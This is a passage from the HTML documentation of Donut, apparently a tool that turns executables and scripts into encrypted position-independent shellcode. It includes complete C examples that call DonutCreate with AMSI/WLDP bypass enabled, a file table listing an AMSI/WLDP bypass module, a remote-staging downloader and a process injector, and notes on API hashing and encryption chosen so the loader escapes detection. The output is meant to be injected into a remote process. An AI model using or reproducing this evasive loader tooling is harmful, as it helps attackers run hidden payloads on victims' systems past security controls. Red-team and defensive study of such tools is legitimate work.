201 <td><code>DONUT_INSTANCE_EMBED</code> indicates a self-contained payload which means the file is embedded. <code>DONUT_INSTANCE_HTTP</code> indicates the file is stored on a remote HTTP server.</td>
202 </tr>
203 <tr>
204 <td><code>inst_len</code></td>
205 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
206 </tr>
207 <tr>
208 <td><code>inst</code></td>
209 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
210 </tr>
211
212 <tr>
213 <td><code>pic_len</code></td>
214 <td>The size of data pointed to by <code>pic</code>.</td>
215 </tr>
216 <tr>
217 <td><code>pic</code></td>
218 <td>Points to the loader/shellcode. This should be injected into a remote process.</td>
219 </tr>
220 </table>
221
222 <h2 id="static">4. Static Example</h2>
223
224 <p>The following is linked with the static library donut.lib on Windows or donut.a on Linux.</p>
225
226 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
227
228 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
229 DONUT_CONFIG c<span style='color:#800080; '>;</span>
230 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
231 <span style='color:#603000; '>FILE</span> <span style='color:#808030; '>*</span>out<span style='color:#800080; '>;</span>
232
233 <span style='color:#696969; '>// need at least a file</span>
234 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
235 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_static &lt;EXE></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
236 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
237 <span style='color:#800080; '>}</span>
238
239 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
240
241 <span style='color:#696969; '>// copy input file</span>
242 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
243
244 <span style='color:#696969; '>// default settings</span>
245 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
246 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
247 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
248 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
249 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
250 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
251 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
252 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
253 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
254
255 <span style='color:#696969; '>// generate the shellcode</span>
256 err <span style='color:#808030; '>=</span> DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
257 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
258 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
259 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
260 <span style='color:#800080; '>}</span>
261
262 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
263
264 DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
265 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
266 <span style='color:#800080; '>}</span>
267 </pre>
268
269 <h2 id="dynamic">5. Dynamic Example</h2>
270
271 <p>This example requires access to donut.dll on Windows or donut.so on Linux.</p>
272
273 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
274
275 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
276 DONUT_CONFIG c<span style='color:#800080; '>;</span>
277 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
278
279 <span style='color:#696969; '>// function pointers</span>
280 DonutCreate_t _DonutCreate<span style='color:#800080; '>;</span>
281 DonutDelete_t _DonutDelete<span style='color:#800080; '>;</span>
282 DonutError_t _DonutError<span style='color:#800080; '>;</span>
283
284 <span style='color:#696969; '>// need at least a file</span>
285 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
286 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_dynamic &lt;file></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
287 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
288 <span style='color:#800080; '>}</span>
289
290 <span style='color:#696969; '>// try load donut.dll or donut.so</span>
291 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>if</span><span style='color:#004a43; '> </span><span style='color:#004a43; '>defined</span><span style='color:#808030; '>(</span><span style='color:#004a43; '>WINDOWS</span><span style='color:#808030; '>)</span>
292 <span style='color:#603000; '>HMODULE</span> m <span style='color:#808030; '>=</span> <span style='color:#400000; '>LoadLibrary</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.dll</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
293 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
294 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
295 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
296 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> <span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
297
298 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
299 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
300 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
301 <span style='color:#800080; '>}</span>
302 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
303 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.dll.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
304 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
305 <span style='color:#800080; '>}</span>
306 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>else</span>
307 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>m <span style='color:#808030; '>=</span> dlopen<span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.so</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> RTLD_LAZY<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
308 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
309 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
310 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
311 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
312
313 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
314 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
315 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
316 <span style='color:#800080; '>}</span>
317 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
318 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.so.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
319 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
320 <span style='color:#800080; '>}</span>
321 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
322
323 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
324
325 <span style='color:#696969; '>// copy input file</span>
326 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
327
328 <span style='color:#696969; '>// default settings</span>
329 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
330 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
331 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
332 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
333 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
334 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
335 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
336 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
337 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
338
339 <span style='color:#696969; '>// generate the shellcode</span>
340 err <span style='color:#808030; '>=</span> _DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
341 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
342 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> _DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
343 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
344 <span style='color:#800080; '>}</span>
345
346 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
347
348 _DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
349 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
350 <span style='color:#800080; '>}</span>
351 </pre>
352
353 <h2>Internals</h2>
354
355 <p>Everything that follows concerns internal workings of Donut and is not required knowledge to generate the shellcode/loader.</p>
356
357 <h2 id="com">6. Donut Components</h2>
358
359 <p>The following table lists the name of each file and what it's used for.</p>
360
361 <table border="1">
362 <tr>
363 <th>File</th>
364 <th>Description</th>
365 </tr>
366 <tr>
367 <td>donut.c</td>
368 <td>Main file for the shellcode generator.</td>
369 </tr>
370 <tr>
371 <td>include/donut.h</td>
372 <td>C header file used by the generator.</td>
373 </tr>
374 <tr>
375 <td>lib/donut.dll and lib/donut.lib</td>
376 <td>Dynamic and static libraries for Microsoft Windows.</td>
377 </tr>
378 <tr>
379 <td>lib/donut.so and lib/donut.a</td>
380 <td>Dynamic and static libraries for Linux.</td>
381 </tr>
382 <tr>
383 <td>lib/donut.h</td>
384 <td>C header file to be used in C/C++ based projects.</td>
385 </tr>
386 <tr>
387 <td>donutmodule.c</td>
388 <td>The CPython wrapper for Donut. Used by the Python module.</td>
389 </tr>
390 <tr>
391 <td>setup.py</td>
392 <td>The setup file for installing Donut as a Pip Python3 module.</td>
393 </tr>
394 <tr>
395 <td>hash.c</td>
396 <td>Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.</td>
397 </tr>
398 <tr>
399 <td>encrypt.c</td>
400 <td>Chaskey block cipher for encrypting modules.</td>
401 </tr>
402 <tr>
403 <td>loader/loader.c</td>
404 <td>Main file for the shellcode.</td>
405 </tr>
406 <tr>
407 <td>loader/inmem_dotnet.c</td>
408 <td>In-Memory loader for .NET EXE/DLL assemblies.</td>
409 </tr>
410 <tr>
411 <td>loader/inmem_pe.c</td>
412 <td>In-Memory loader for EXE/DLL files.</td>
413 </tr>
414 <tr>
415 <td>loader/inmem_script.c</td>
416 <td>In-Memory loader for VBScript/JScript files.</td>
417 </tr>
418 <tr>
419 <td>loader/activescript.c</td>
420 <td>ActiveScriptSite interface required for in-memory execution of VBS/JS files.</td>
421 </tr>
422 <tr>
423 <td>loader/wscript.c</td>
424 <td>Supports a number of WScript methods that cscript/wscript support.</td>
425 </tr>
426 <tr>
427 <td>loader/depack.c</td>
428 <td>Supports unpacking of modules compressed with aPLib.</td>
429 </tr>
430 <tr>
431 <td>loader/bypass.c</td>
432 <td>Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).</td>
433 </tr>
434 <tr>
435 <td>loader/http_client.c</td>
436 <td>Downloads a module from remote staging server into memory.</td>
437 </tr>
438 <tr>
439 <td>loader/peb.c</td>
440 <td>Used to resolve the address of DLL functions via Process Environment Block (PEB).</td>
441 </tr>
442 <tr>
443 <td>loader/clib.c</td>
444 <td>Replaces common C library functions like memcmp, memcpy and memset.</td>
445 </tr>
446 <tr>
447 <td>loader/getpc.c</td>
448 <td>Assembly code stub to return the value of the EIP register.</td>
449 </tr>
450 <tr>
451 <td>loader/inject.c</td>
452 <td>Simple process injector for Windows that can be used for testing the loader.</td>
453 </tr>
454 <tr>
455 <td>loader/runsc.c</td>
456 <td>Simple shellcode runner for Linux and Windows that can be used for testing the loader.</td>
457 </tr>
458 <tr>
459 <td>loader/exe2h/exe2h.c</td>
460 <td>Extracts the machine code from compiled loader and saves as array to C header and Go files.</td>
461 </tr>
462 </table>
463
464 <h2 id="instance">7. Donut Instance</h2>
465
466 <p>The loader will always contain an <var>Instance</var> which can be viewed simply as a configuration. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, if encryption is enabled, it will decrypt the data before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. The data will be decompressed if required and only then is it loaded into memory for execution.</p>
467
468 <h2 id="module">8. Donut Module</h2>
469
470 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
471
472 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
473 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE/DLL/JS/VBS</span>
474 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread</span>
475 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// indicates engine used for compression</span>
476
477 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
478 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
479 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
480 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
481
482 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for both managed and unmanaged DLL/EXE</span>
483 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// convert param to unicode before passing to DLL function</span>
484
485 <span style='color:#800000; font-weight:bold; '>char</span> sig<span style='color:#808030; '>[</span>DONUT_SIG_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to verify decryption</span>
486 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// hash of sig, to verify decryption was ok</span>
487
488 uint32_t zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compressed size of EXE/DLL/JS/VBS file</span>
489 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// real size of EXE/DLL/JS/VBS file</span>
490 uint8_t data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/JS/VBS file</span>
491 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
492 </pre>
493
494 <h2 id="hashing">9. Win32 API Hashing</h2>
495
496 <p>A hash function called <a href="https://github.com/odzhan/maru">Maru</a> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the <a href="https://tinycrypt.wordpress.com/2017/01/11/asmcodes-speck/">SPECK</a> block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
497
498 <h2 id="encryption">10. Symmetric Encryption</h2>
499
500 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
501
502 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
503 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
504 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
505 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
506 </pre>
507
508 <p><a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a>, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut loader. Future releases will support downloading a key via DNS and also asymmetric encryption.</p>
509
510 <h2 id="bypass">11. Bypasses for AMSI/WLDP</h2>
511
512 <p>Donut includes a bypass system for AMSI and WLDP. Currently, Donut can bypass:</p>
513
514 <ul>
515 <li>AMSI in .NET v4.8</li>
516 <li>Device Guard policy preventing dynamically generated code from executing.</li>
517 </ul>
518
